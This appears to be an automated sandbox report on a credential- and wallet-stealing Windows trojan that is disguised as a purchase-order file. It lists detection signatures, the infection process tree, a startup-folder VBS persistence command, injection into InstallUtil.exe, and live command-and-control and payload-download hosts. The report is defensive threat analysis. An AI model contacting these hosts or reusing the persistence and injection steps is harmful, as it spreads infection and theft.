Windows Analysis Report
PO-12202432_ACD_Group.pif.exe

Overview

General Information

Sample name: PO-12202432_ACD_Group.pif.exe
Analysis ID: 1586913
MD5: 95bec6594e293a42f4abb049ea7e81db
SHA1: 36ece8150f0619fc81bbf92bd840cad252bf1aea
SHA256: 43057c1f8e32c29342cfb790c692c291f33526f9be1380758b9c7c42344a5948

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • PO-12202432_ACD_Group.pif.exe (PID: 4992 cmdline: "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe" MD5: 95BEC6594E293A42F4ABB049EA7E81DB)
    • InstallUtil.exe (PID: 6340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7188 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • IsNestedFamANDAssem.exe (PID: 1788 cmdline: "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" MD5: 95BEC6594E293A42F4ABB049EA7E81DB)
      • InstallUtil.exe (PID: 6000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000004.00000002.69719834098.0000000004883000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.69506645006.0000000006590000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
4.2.IsNestedFamANDAssem.exe.4883b08.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.PO-12202432_ACD_Group.pif.exe.6590000.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.PO-12202432_ACD_Group.pif.exe.3b909a0.1.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

                  System Summary

                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , ProcessId: 7188, ProcessName: wscript.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , ProcessId: 7188, ProcessName: wscript.exe

                  Data Obfuscation

                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe, ProcessId: 4992, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-09T19:07:58.009916+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 193.187.91.218 | 50787 | 192.168.11.20 | 49752 | TCP

                  AV Detection

                  Source: PO-12202432_ACD_Group.pif.exeAvira: detected
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeAvira: detection malicious, Label: TR/AVI.MalwareX.nhsfu
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeReversingLabs: Detection: 68%
                  Source: PO-12202432_ACD_Group.pif.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeJoe Sandbox ML: detected
                  Source: PO-12202432_ACD_Group.pif.exeJoe Sandbox ML: detected
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: IsNestedFamANDAssem.exe, 00000004.00000002.69719834098.0000000004D18000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: IsNestedFamANDAssem.exe, 00000004.00000002.69719834098.0000000004D18000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 066BE693h0_2_066BE318
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 066BE693h0_2_066BE497
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 066BE693h0_2_066BE308
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06D7E693h4_2_06D7E318
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06D7E693h4_2_06D7E497
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06D7E693h4_2_06D7E308

                  Networking

                  Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.187.91.218:50787 -> 192.168.11.20:49752
                  Source: unknownDNS query: name: pureeratee.duckdns.org
                  Source: global trafficTCP traffic: 192.168.11.20:49752 -> 193.187.91.218:50787
                  Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: www.chirreeirl.com
                  Source: global trafficDNS traffic detected: DNS query: pureeratee.duckdns.org
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: InstallUtil.exe, 00000002.00000002.71818781121.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmS
                  Source: InstallUtil.exe, 00000002.00000002.71818781121.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl9
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002921000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002921000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chirreeirl.com
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69483700366.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chirreeirl.com/
                  Source: PO-12202432_ACD_Group.pif.exe, IsNestedFamANDAssem.exe.0.drString found in binary or memory: https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49753 version: TLS 1.2

                  System Summary

                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A1C88 NtProtectVirtualMemory,0_2_066A1C88
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A4B38 NtResumeThread,0_2_066A4B38
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A1C81 NtProtectVirtualMemory,0_2_066A1C81
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A4B30 NtResumeThread,0_2_066A4B30
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BAFEC0 NtProtectVirtualMemory,4_2_06BAFEC0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BAFEB8 NtProtectVirtualMemory,4_2_06BAFEB8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D631D8 NtResumeThread,4_2_06D631D8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D631D0 NtResumeThread,4_2_06D631D0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C474B04_2_06C474B0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C400404_2_06C40040
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C474A04_2_06C474A0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C4BC634_2_06C4BC63
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C400064_2_06C40006
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C479C14_2_06C479C1
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C461984_2_06C46198
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C461A84_2_06C461A8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63CEC4_2_06D63CEC
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D640AC4_2_06D640AC
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63C704_2_06D63C70
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63C604_2_06D63C60
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D6414D4_2_06D6414D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63D2E4_2_06D63D2E
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63D2B4_2_06D63D2B
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D797F04_2_06D797F0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D73D704_2_06D73D70
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D797DF4_2_06D797DF
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D7E4974_2_06D7E497
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D7BCB84_2_06D7BCB8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D7BCA84_2_06D7BCA8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D79C254_2_06D79C25
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_0704E2B04_2_0704E2B0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_0704DF004_2_0704DF00
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_070300064_2_07030006
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_070300404_2_07030040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1A405_2_024C1A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C23F85_2_024C23F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24625_2_024C2462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24785_2_024C2478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C243C5_2_024C243C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24CF5_2_024C24CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24E65_2_024C24E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C248E5_2_024C248E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24A75_2_024C24A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C455F5_2_024C455F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1A405_2_024C1A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1A305_2_024C1A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C4B405_2_024C4B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1E205_2_024C1E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1E305_2_024C1E30
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69483700366.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameOrkexnhsfu.exe" vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000000.69354653342.00000000004C2000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.000000000296C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilename vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.00000000060E8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69504846703.0000000006310000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameFozxv.dll" vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe; Binary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
Source: PO-12202432_ACD_Group.pif.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine; Classification label: mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Mutant created: \Sessions\1\BaseNamedObjects\fc2a428e6332
Source: unknown; Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
Source: PO-12202432_ACD_Group.pif.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PO-12202432_ACD_Group.pif.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wscript.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PO-12202432_ACD_Group.pif.exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe; File read: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
Source: unknown; Process created: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe"
Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
